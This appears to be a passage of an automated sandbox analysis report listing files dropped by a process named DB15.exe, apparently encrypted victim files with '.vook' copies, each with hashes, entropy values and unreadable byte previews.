                                                                                                                                                                                                                                      SSDEEP:24:NP2ASNr2kUbJ2LuYl+tTojUNmrtGvA+Rzbtj7BoxWQVeozzHyZ9RCJBmiTkbD:NP2AwUsLuYl+iogrtQHx3BIrknhyBDiD
                                                                                                                                                                                                                                      MD5:78621F4BC5FEEFFE4B57BCA6904F05CC
                                                                                                                                                                                                                                      SHA1:DF64D9385DE287C4984BCC01D9B416ED85626B83
                                                                                                                                                                                                                                      SHA-256:F1AED6432A0E61B55D3C452A9EB8613AB4FAB567D546B8B5AD01D62303E40404
                                                                                                                                                                                                                                      SHA-512:6B889361045E7DD3883140B6030B00383EC8F7A87E933C7B13D19A76B132E81F682016DD6D76AB9ADDA82CA8AA66590EF06E3818B359BD4EFC1C0240B64CF7D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ#. g#+z..{ON..".g....cdY......0e..>.d.U.5j.....LW%.L...T..DH.7....$..i.va`...k....t..$...l #.^...........h......WY.M(.......&..L.<..,.2$..Y...T7.xoJ.$.p.....4.,_.]a.Q..~..e.eJ....=..0N..S..O3.....e....'..b..er?>%.b...O..o.n...:G..b..k.....\.).L..1.!l.]qe.T'j._.>^.d....ge...D.8.O...m.....g.j....b7M..{}../([......=....$%j.9.....KD% Y...Siq:.!...Q$......3..e..............&.-...G.uP..)qru.........Nk..df4....D.[^..E....&.'.B..kg...\H.[.+M....K3....[.J16..,. ..w.3@~...^.<.....#.t.\.A....t...`nTV.W.Gvn...".....j]..F.}....[k"...,.v.. ..I.k;]...L...k5u..;.....O[(.......pT......t..R.c........(..3.};-.q.................@.$.I.........`...dI.....FD.6.l..M..:.|A.@n..c.K....@.o.p...:.gM..j..s......A#.....0AVf...g..4......+..)..FX:n..@.u=.iJ.n.......o|.e.dO....R.Y...`...._.Z..v.6Hl.r.. a?..A.7.(..b.v.<.....).:^...;....F....z/.}...*...m.\.x.?N..O.N..O..T.../[m...p../.1].i%.I?.Up~...'v.q..!U.D....E?............7!...N.......!.l.m.A..J.e...r.Vh...\.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.859501164578004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4Lczjq4+vD9D8YLHo5U4Vf0rqyCXKrGEUdeHMQmwlScNmWLvEdUImxlVZW26iTkX:4Lc3boNLHFrq7KrGEeesQ7lScNjLnImm
                                                                                                                                                                                                                                      MD5:8D48987BCD150DA982B3A2FE23A6CDD3
                                                                                                                                                                                                                                      SHA1:0A7DA54B7E91E5EC77035F107B0A11370EBC35E3
                                                                                                                                                                                                                                      SHA-256:BE1928A8D92A5B7675C9F58855A5A276098CB545171CAFA8C35DD58FDA461F30
                                                                                                                                                                                                                                      SHA-512:3ABD3E31D641C551EC52C30D0FC6D53EB337CC60639000F02C2E3CB7139067006361E05491300C0B03AD85C076AE8406F6825B694377751E7863B42CEA44B037
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ...... ..7..].Mh.[..mQ....In$#Z...}3f.~..X`..Y.)j.R...t......Xu......Z.R|j..6..8..2.?`.d).PR...4.."2...cW(A..Z.......F..............a..G.~w.j.Q...'G.v..D=-..c....,.Zx...V...Z9.V!..........k]..I...9.......3C.T.?...8:.~.*....%..9.G.$.ntO..S....Z...M.#b...c... .....Q.[p...B....K.7...J....g$ .$q9...B?}.&....:.[.#So....ls`v.r...."B..W..dhB$(.........XXo6...F:.!..?..A..Z..4..i..[.i................2..L.....j.s...;.).&y.<%[..2...~.9Y....pmT....$....|%S;f(:.....&=v..".).WV..pO.v.m....=.N....|...^K......x...<Mm.Yc\.....Fy.>....8..;..1/q..w...P...%'......r..q.^1.......g.A...a...'...[.ma..M1T...1R....#G =....d......fOI....zY..tz.....lj....4.1h..D..K8?..c.}..%.Id.../.._..E....$...D.........5u.&....E.=w......b...L#0..!.V.q......4....Y D..z.O.Cj...YB...8.6..805w.[Pz.u.Z.....|.F....U......3..FeB0.+..B..^...@...+..qG.x..S)7%..[s. ..V. .n..o?374L.*.k. .:q....n...v....o...M.k..k.L.....C..,....[...^]..M...a).g._...n7............{(....0.P6..~#.p.^..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.859501164578004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4Lczjq4+vD9D8YLHo5U4Vf0rqyCXKrGEUdeHMQmwlScNmWLvEdUImxlVZW26iTkX:4Lc3boNLHFrq7KrGEeesQ7lScNjLnImm
                                                                                                                                                                                                                                      MD5:8D48987BCD150DA982B3A2FE23A6CDD3
                                                                                                                                                                                                                                      SHA1:0A7DA54B7E91E5EC77035F107B0A11370EBC35E3
                                                                                                                                                                                                                                      SHA-256:BE1928A8D92A5B7675C9F58855A5A276098CB545171CAFA8C35DD58FDA461F30
                                                                                                                                                                                                                                      SHA-512:3ABD3E31D641C551EC52C30D0FC6D53EB337CC60639000F02C2E3CB7139067006361E05491300C0B03AD85C076AE8406F6825B694377751E7863B42CEA44B037
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ...... ..7..].Mh.[..mQ....In$#Z...}3f.~..X`..Y.)j.R...t......Xu......Z.R|j..6..8..2.?`.d).PR...4.."2...cW(A..Z.......F..............a..G.~w.j.Q...'G.v..D=-..c....,.Zx...V...Z9.V!..........k]..I...9.......3C.T.?...8:.~.*....%..9.G.$.ntO..S....Z...M.#b...c... .....Q.[p...B....K.7...J....g$ .$q9...B?}.&....:.[.#So....ls`v.r...."B..W..dhB$(.........XXo6...F:.!..?..A..Z..4..i..[.i................2..L.....j.s...;.).&y.<%[..2...~.9Y....pmT....$....|%S;f(:.....&=v..".).WV..pO.v.m....=.N....|...^K......x...<Mm.Yc\.....Fy.>....8..;..1/q..w...P...%'......r..q.^1.......g.A...a...'...[.ma..M1T...1R....#G =....d......fOI....zY..tz.....lj....4.1h..D..K8?..c.}..%.Id.../.._..E....$...D.........5u.&....E.=w......b...L#0..!.V.q......4....Y D..z.O.Cj...YB...8.6..805w.[Pz.u.Z.....|.F....U......3..FeB0.+..B..^...@...+..qG.x..S)7%..[s. ..V. .n..o?374L.*.k. .:q....n...v....o...M.k..k.L.....C..,....[...^]..M...a).g._...n7............{(....0.P6..~#.p.^..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852759807946296
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Fa0eWaiSsfiLI7dUow9MBEYQpHLekWrqNuPuP7w2+3zxAN1aBYs9+XiTkbD:FaiulLIGaBeZekWeyCL+3tAN1sY6iD
                                                                                                                                                                                                                                      MD5:D87111B030688D0AFEDF9A6C58C083E2
                                                                                                                                                                                                                                      SHA1:3B6F76DB041AE0FE196DB0326266C96C07AB5BF0
                                                                                                                                                                                                                                      SHA-256:52DA4F1C930FE399C4066D9B0AC42F5BB78A2DBB9400D2081D2A3E77B2E617F3
                                                                                                                                                                                                                                      SHA-512:8DB4BA1AA95D6A11B1DA9FAC17C1F2BC3942CD51E007303D01FC117448E5494A0739CFB72165EC2D43340B7CE8BD0383DA6368FB777AAF11EFFC1783DD6D9F97
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.v<5S....,=.I..0g9.8..P....W..\..Mj.f.v.9...;+Au.&].x?..7..Go;7B.....pPf{~.....|..|..x..#.!.G..D.T.[.`Y.........M..s....8.14d..{j...fI.c&{. n...PF..0.2..&...P.}~.NEzj_..}...Yx.3._..L.\+..i..0.Y...s..ea....T9W)..`l.Q...7.......c...y....?{...[..^{...Z;3N..5+....[.U.TJq3.`.9.B|}..#.>....i.....%w..t....G/j8ZF..(..Qs.s1|..g5.<....;..S.{`..=..z......e..00mY[....N......8i..._Q1.D#!..,....}..yT...Q.=.:C.(,..&..a..#D.B]).4=4.0..3if...a.!r....g.O...4MH...>...k.....omo..9........3.-..B....;..P..I..r m<..nIt...W.'%J.......*.y..W...%.6%...!.o....5...4.}fZ...W......uui82e.....yIb.e$..P..H...z.*.f..oa. ..RV..f{...Ak(.#gFTi.t.%..&..R.e..;.n....M.U.y.W=..c`3.0.L....D,_p=g.D.K...te..o......h..KJu......d..p..dRJ..r}..$vuv.\|..,>'/t.D#..../.o...h.+..4+V.w.q.T.:......[^.L..m.. .0n3.3....d_VM....'.3Z8..%....y........O|k!.Cf.]Q...r.+....BI...z8...<.b...x...9<*../...co&.s..R....:5V.g^bY...'....D9.......L.....Hm?../#.Q.....[.\.(4...%.-......c..........3...5*I

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852759807946296
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Fa0eWaiSsfiLI7dUow9MBEYQpHLekWrqNuPuP7w2+3zxAN1aBYs9+XiTkbD:FaiulLIGaBeZekWeyCL+3tAN1sY6iD
                                                                                                                                                                                                                                      MD5:D87111B030688D0AFEDF9A6C58C083E2
                                                                                                                                                                                                                                      SHA1:3B6F76DB041AE0FE196DB0326266C96C07AB5BF0
                                                                                                                                                                                                                                      SHA-256:52DA4F1C930FE399C4066D9B0AC42F5BB78A2DBB9400D2081D2A3E77B2E617F3
                                                                                                                                                                                                                                      SHA-512:8DB4BA1AA95D6A11B1DA9FAC17C1F2BC3942CD51E007303D01FC117448E5494A0739CFB72165EC2D43340B7CE8BD0383DA6368FB777AAF11EFFC1783DD6D9F97
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.v<5S....,=.I..0g9.8..P....W..\..Mj.f.v.9...;+Au.&].x?..7..Go;7B.....pPf{~.....|..|..x..#.!.G..D.T.[.`Y.........M..s....8.14d..{j...fI.c&{. n...PF..0.2..&...P.}~.NEzj_..}...Yx.3._..L.\+..i..0.Y...s..ea....T9W)..`l.Q...7.......c...y....?{...[..^{...Z;3N..5+....[.U.TJq3.`.9.B|}..#.>....i.....%w..t....G/j8ZF..(..Qs.s1|..g5.<....;..S.{`..=..z......e..00mY[....N......8i..._Q1.D#!..,....}..yT...Q.=.:C.(,..&..a..#D.B]).4=4.0..3if...a.!r....g.O...4MH...>...k.....omo..9........3.-..B....;..P..I..r m<..nIt...W.'%J.......*.y..W...%.6%...!.o....5...4.}fZ...W......uui82e.....yIb.e$..P..H...z.*.f..oa. ..RV..f{...Ak(.#gFTi.t.%..&..R.e..;.n....M.U.y.W=..c`3.0.L....D,_p=g.D.K...te..o......h..KJu......d..p..dRJ..r}..$vuv.\|..,>'/t.D#..../.o...h.+..4+V.w.q.T.:......[^.L..m.. .0n3.3....d_VM....'.3Z8..%....y........O|k!.Cf.]Q...r.+....BI...z8...<.b...x...9<*../...co&.s..R....:5V.g^bY...'....D9.......L.....Hm?../#.Q.....[.\.(4...%.-......c..........3...5*I

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854984970555027
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:BZeodhiNXlPAMNxnjISF8WfX5eqCOTBikKYIdaS7M/25J3jrepSiTkbD:feo+N1PAMrnjII8SX5hCEYkeaSj5pepq
                                                                                                                                                                                                                                      MD5:75AC620436C4BA2DC704C4177DBFB620
                                                                                                                                                                                                                                      SHA1:6323F4D3B7DADF3210B2952990D8F00F110F29E8
                                                                                                                                                                                                                                      SHA-256:5E594C7C36C465BBD0418167D8F6CD4C2AD9AA4D6C08BEFA63C46F3C3EB73583
                                                                                                                                                                                                                                      SHA-512:61AD78C2224745DC513D0EB575D9A57A607C82D10709FC754C48496BCB5D5416CBAD8F35945FF72DEDE77E6B71089DFC3F9E6586987503514D5D4A16D79A8DC7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA......\. ...V3sr8V.=NB.F.7qV0..#.F-.5...b....C......X..3c.d"..}.S....v~.........(Cm.Z......w4...<l..@.YPwTD....R@.......uFH.....]..qI...ls..evL.Xs......Q./.h..t."}u.j.......d&.l"...};..j.....j.)b.....ek...N...(...m$....:+..N.^.N...B.i.]H!F.A....._S_.......F....,dP.O....%T.......g5...;!...4......M...&.k/.......8.z..in..\r...0.....C.9.7..z...S(O...z....iFM..o.....).d.*..M...;#.n...z..f)]...L..Aj.\.Wd..s..B...<W.o.X....^..2.&F.w.xW@...9...C.. .>..:.Z.T{.....4.p../.i.....b..@..A.',>.yy...@..K..h....>...h.2....'.E.=....O?>V/Q..Ha.T\AH."...m.W.1v..a.U./M......D...^.X3..Y...F....M~p...8b..K...u...[..Z.a..^|.(....GG.>E...y..mJ..L..X1.....^.....8.,,X..3......-.....6....sh.CS...37...[.+:.u..:h.:m.{uY...G.I.|.n.m..kNe..T9b..Y.....u..MM..E......O....L:.:.........]}.c.3.......Hkh..F6...r...i.x\...X...V.?fB...=....)d`.6...gEW.9*..f.J.f=.d...z.2.t.y..c"..$...O..,&#..i.....{Y..M|.N..*....4V@.....O..x.X.......Eh.a.E7Pj.vBY.H....!..7.0......}.kG.:.j

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854984970555027
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:BZeodhiNXlPAMNxnjISF8WfX5eqCOTBikKYIdaS7M/25J3jrepSiTkbD:feo+N1PAMrnjII8SX5hCEYkeaSj5pepq
                                                                                                                                                                                                                                      MD5:75AC620436C4BA2DC704C4177DBFB620
                                                                                                                                                                                                                                      SHA1:6323F4D3B7DADF3210B2952990D8F00F110F29E8
                                                                                                                                                                                                                                      SHA-256:5E594C7C36C465BBD0418167D8F6CD4C2AD9AA4D6C08BEFA63C46F3C3EB73583
                                                                                                                                                                                                                                      SHA-512:61AD78C2224745DC513D0EB575D9A57A607C82D10709FC754C48496BCB5D5416CBAD8F35945FF72DEDE77E6B71089DFC3F9E6586987503514D5D4A16D79A8DC7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA......\. ...V3sr8V.=NB.F.7qV0..#.F-.5...b....C......X..3c.d"..}.S....v~.........(Cm.Z......w4...<l..@.YPwTD....R@.......uFH.....]..qI...ls..evL.Xs......Q./.h..t."}u.j.......d&.l"...};..j.....j.)b.....ek...N...(...m$....:+..N.^.N...B.i.]H!F.A....._S_.......F....,dP.O....%T.......g5...;!...4......M...&.k/.......8.z..in..\r...0.....C.9.7..z...S(O...z....iFM..o.....).d.*..M...;#.n...z..f)]...L..Aj.\.Wd..s..B...<W.o.X....^..2.&F.w.xW@...9...C.. .>..:.Z.T{.....4.p../.i.....b..@..A.',>.yy...@..K..h....>...h.2....'.E.=....O?>V/Q..Ha.T\AH."...m.W.1v..a.U./M......D...^.X3..Y...F....M~p...8b..K...u...[..Z.a..^|.(....GG.>E...y..mJ..L..X1.....^.....8.,,X..3......-.....6....sh.CS...37...[.+:.u..:h.:m.{uY...G.I.|.n.m..kNe..T9b..Y.....u..MM..E......O....L:.:.........]}.c.3.......Hkh..F6...r...i.x\...X...V.?fB...=....)d`.6...gEW.9*..f.J.f=.d...z.2.t.y..c"..$...O..,&#..i.....{Y..M|.N..*....4V@.....O..x.X.......Eh.a.E7Pj.vBY.H....!..7.0......}.kG.:.j

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836283981396479
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:0UDzkQ3R6jZi8yCJ7n/f4RVYlaQIv4qZUB1LmiqmUI3S+ejb+hgQiTkbD:0UDzkuR6ozCb/oO+u3yiqrKS+enBiD
                                                                                                                                                                                                                                      MD5:A1750CCA1A8B635F0F2BE14BCEABB79A
                                                                                                                                                                                                                                      SHA1:D371653A673B645F0D178FF32A1898A7BC606DD5
                                                                                                                                                                                                                                      SHA-256:D88111F63B6CFA4AE3848985938DFD92EA35402204941AFF6F943DFC5F8274A4
                                                                                                                                                                                                                                      SHA-512:FD861809C0595ACDFFAAC4320F53ACB3D221E12373068E01E444FE9C208EE8DA7000B789E36B715FB34995C540ED7BA26787E91AAFE3414C3294DB768AA542CF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA..AH..f9...m.XI0B..)...w|.....{0.?..`......`!_.%...a!.......q.....dIj*j....D..g.U7B.BJ..}KH-4]..'...E...%.....q1....!G.&.. ..J.A+........d.`.\O..a.-".M\.....].cA0.N..I......R...2..q0.|ZZ..:u.u@..:.a..f.O.QVCJ4/e.ou.8.E.-..a.:....OP._,..~p<A....M.*......./:.../t..BY.."R.2.`B.g...ql\.>....s.O}.RN...7.:Z..q.x.VE..|.k.../}....9...=M.Xj..)}.u.....................$^^0K...n,.H.K.....:...P".612s.....[...a...n.G._..dje.E.m...(~..8t.k...+.P..=v... X=.Uy5.t..g.=..4].4.L..&.uk..G..I.2&..Q@...G3.....)./.T...S....[j4.;=..=<=...3...o.9#_.Z......o.X.|........xS....:.'..8..S..B.BsXh..t.Q.L.Y..>u+...&^.>iVo.|.Fw.&8.D.9>G.I..o.Q]*..6\C..G..{$r.5.N{..6.q61u....T.....Q...jGp.h.F.i.qWdwa...G.F.G...G^..<..\^...Z.n:....a_.)@.y..&P[.u7.J.y.xq.v...,...0:..qY...hN;0.XU..B..F...Q..FM..~..d....B..|........6..d...d'....C6L....>@.....u`....i.a..]w..*.[../....I7.k..c..".Z....|r.....h...D.<G.(....U.{.I/..4..;C.0.....7kv.[;..u.c..{....2...5&~....B...R.7..2[...y.g....c.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836283981396479
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:0UDzkQ3R6jZi8yCJ7n/f4RVYlaQIv4qZUB1LmiqmUI3S+ejb+hgQiTkbD:0UDzkuR6ozCb/oO+u3yiqrKS+enBiD
                                                                                                                                                                                                                                      MD5:A1750CCA1A8B635F0F2BE14BCEABB79A
                                                                                                                                                                                                                                      SHA1:D371653A673B645F0D178FF32A1898A7BC606DD5
                                                                                                                                                                                                                                      SHA-256:D88111F63B6CFA4AE3848985938DFD92EA35402204941AFF6F943DFC5F8274A4
                                                                                                                                                                                                                                      SHA-512:FD861809C0595ACDFFAAC4320F53ACB3D221E12373068E01E444FE9C208EE8DA7000B789E36B715FB34995C540ED7BA26787E91AAFE3414C3294DB768AA542CF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA..AH..f9...m.XI0B..)...w|.....{0.?..`......`!_.%...a!.......q.....dIj*j....D..g.U7B.BJ..}KH-4]..'...E...%.....q1....!G.&.. ..J.A+........d.`.\O..a.-".M\.....].cA0.N..I......R...2..q0.|ZZ..:u.u@..:.a..f.O.QVCJ4/e.ou.8.E.-..a.:....OP._,..~p<A....M.*......./:.../t..BY.."R.2.`B.g...ql\.>....s.O}.RN...7.:Z..q.x.VE..|.k.../}....9...=M.Xj..)}.u.....................$^^0K...n,.H.K.....:...P".612s.....[...a...n.G._..dje.E.m...(~..8t.k...+.P..=v... X=.Uy5.t..g.=..4].4.L..&.uk..G..I.2&..Q@...G3.....)./.T...S....[j4.;=..=<=...3...o.9#_.Z......o.X.|........xS....:.'..8..S..B.BsXh..t.Q.L.Y..>u+...&^.>iVo.|.Fw.&8.D.9>G.I..o.Q]*..6\C..G..{$r.5.N{..6.q61u....T.....Q...jGp.h.F.i.qWdwa...G.F.G...G^..<..\^...Z.n:....a_.)@.y..&P[.u7.J.y.xq.v...,...0:..qY...hN;0.XU..B..F...Q..FM..~..d....B..|........6..d...d'....C6L....>@.....u`....i.a..]w..*.[../....I7.k..c..".Z....|r.....h...D.<G.(....U.{.I/..4..;C.0.....7kv.[;..u.c..{....2...5&~....B...R.7..2[...y.g....c.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860516965351808
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:ZNsXwr6dzDIWur30A/Sl7GMPwTTaTDWQKTvkESQy6I1MwIqHguMlvgixkhZiTkbD:ZPOgeJYH+qQAvk9n6HPuM5RkCiD
                                                                                                                                                                                                                                      MD5:7AD684663D39A168567402CC21C13DBA
                                                                                                                                                                                                                                      SHA1:E5C8593BFDA35A078D93909732323F3E1C974D8B
                                                                                                                                                                                                                                      SHA-256:E07F5AF407E93D75D7CF9BE1E59DFAF9A6FB64AB624AF000695E4EC0AD430A7F
                                                                                                                                                                                                                                      SHA-512:FF44981AA62CF997C3E75E463726EB1E49696FF4E7F099F22D101306CC281E42B41E628753CC2516A0FE02C7C1C34691546500E77557488222D03FFC4F47BD02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA\..bG[r~.b..wi.....Zb.(..{..7..:.1..3....k..4.Q.....2.)......Z-e..o..m..0.Ru........7..~.G.6...c...(q..+o..N..m..A$.......u-Bm...d.23('..0..g..r.........X.8.2.=.'d.+...P.uH...\.C. E....@..LS.t.."MI...s...E...!........]..#.].K.t. s.H.._.yJ..#..=..+3.....-.0.(..I.B...uh}.$tuw.}.. ..zvZ..C..uw...%k[..:..N._._.T......5.....l4..,.nun.!|........>.#K.'...9. .?3.......R.!...s..Z.;.a.y.n ...nE.+F...7.k.B.6..O.7s.3.;.E.M.rAxtL...+y...?.K.....s.e..:......l..7!.v.....T.r].......;H....z[.@.....@.e...f..@:..........{@Fr.....R.i...P...X'<.i).....vY..|.~ f.&...:.6w....i..@...{....@..@.......p.C.@...B,...X..........;..o..*..1....)3.Q~K..,.X.....&...i.W.(.x..w.....Q.Y>3N...q.Q._O.)o1)&HiB..[6.D.I......;.I...J.&fe<.!2.&A=7..A.:....p. .N....'....v..sZ...#...tM..S....S...k-..t.T.....1.7.}...F.& ...^.D3u....W..f.R........{..=A..G.......A..%.....nZNM.T.0..l.@I......^y..G...U...\N....J.f!V.l..<.3&.F*.(.l..?;jg3P....S),.......~..........jJ##.w...

                                                                                                                                                                                                                                      C:\Users\user\Downloads\PWCCAWLGRE.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860516965351808
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:ZNsXwr6dzDIWur30A/Sl7GMPwTTaTDWQKTvkESQy6I1MwIqHguMlvgixkhZiTkbD:ZPOgeJYH+qQAvk9n6HPuM5RkCiD
                                                                                                                                                                                                                                      MD5:7AD684663D39A168567402CC21C13DBA
                                                                                                                                                                                                                                      SHA1:E5C8593BFDA35A078D93909732323F3E1C974D8B
                                                                                                                                                                                                                                      SHA-256:E07F5AF407E93D75D7CF9BE1E59DFAF9A6FB64AB624AF000695E4EC0AD430A7F
                                                                                                                                                                                                                                      SHA-512:FF44981AA62CF997C3E75E463726EB1E49696FF4E7F099F22D101306CC281E42B41E628753CC2516A0FE02C7C1C34691546500E77557488222D03FFC4F47BD02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA\..bG[r~.b..wi.....Zb.(..{..7..:.1..3....k..4.Q.....2.)......Z-e..o..m..0.Ru........7..~.G.6...c...(q..+o..N..m..A$.......u-Bm...d.23('..0..g..r.........X.8.2.=.'d.+...P.uH...\.C. E....@..LS.t.."MI...s...E...!........]..#.].K.t. s.H.._.yJ..#..=..+3.....-.0.(..I.B...uh}.$tuw.}.. ..zvZ..C..uw...%k[..:..N._._.T......5.....l4..,.nun.!|........>.#K.'...9. .?3.......R.!...s..Z.;.a.y.n ...nE.+F...7.k.B.6..O.7s.3.;.E.M.rAxtL...+y...?.K.....s.e..:......l..7!.v.....T.r].......;H....z[.@.....@.e...f..@:..........{@Fr.....R.i...P...X'<.i).....vY..|.~ f.&...:.6w....i..@...{....@..@.......p.C.@...B,...X..........;..o..*..1....)3.Q~K..,.X.....&...i.W.(.x..w.....Q.Y>3N...q.Q._O.)o1)&HiB..[6.D.I......;.I...J.&fe<.!2.&A=7..A.:....p. .N....'....v..sZ...#...tM..S....S...k-..t.T.....1.7.}...F.& ...^.D3u....W..f.R........{..=A..G.......A..%.....nZNM.T.0..l.@I......^y..G...U...\N....J.f!V.l..<.3&.F*.(.l..?;jg3P....S),.......~..........jJ##.w...

                                                                                                                                                                                                                                      C:\Users\user\Downloads\QNCYCDFIJJ.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852157928307316
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:x3pFP7T3MX5iV+Q2wjVtUO8k4BPmRit9zXKflK6E8OR/08s/iTkbD:x37TTs5iV+XnmRiKYvr/BXiD
                                                                                                                                                                                                                                      MD5:FAE676442245139F60FEE8C663B1B1EB
                                                                                                                                                                                                                                      SHA1:56F79592EF689D529AE6D4AD6BCF23A22755751A
                                                                                                                                                                                                                                      SHA-256:D453B4A2C8347202B2B4C6444E05F0CD1BEF74CA7C69B7B951C1A8139CDB4A4B
                                                                                                                                                                                                                                      SHA-512:B22CFC5E76F68A4B6F45AC00743BEBADC87465F6AC4F347F039C3F7B61AFF6DD33D43DBE956E4F4432DD924FBEBABDB6DFE4DCD64447DAF6C24B4EB9D4DC2A11
                                                                                                                                                                                                                                      Malicious:false
